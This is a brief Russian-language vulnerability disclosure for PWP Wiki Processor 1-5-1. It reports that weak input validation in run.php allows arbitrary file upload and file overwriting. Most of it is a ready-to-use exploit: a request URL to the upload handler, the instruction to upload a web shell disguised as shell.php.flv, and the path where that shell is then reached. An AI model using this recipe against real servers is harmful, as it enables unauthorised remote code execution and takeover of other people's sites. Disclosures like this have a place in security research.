Программа: PWP Wiki Processor 1-5-1
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных сценарием
run.php. Атакующий может загрузить произвольные файлы на целевую систему.
Эксплоит:
www.site..com/path/wiki/run.php?iRequest=upload/UploadList
(upload shell.php.flv)
shell: www.site.com/path/wiki/upload/shell.php.flv
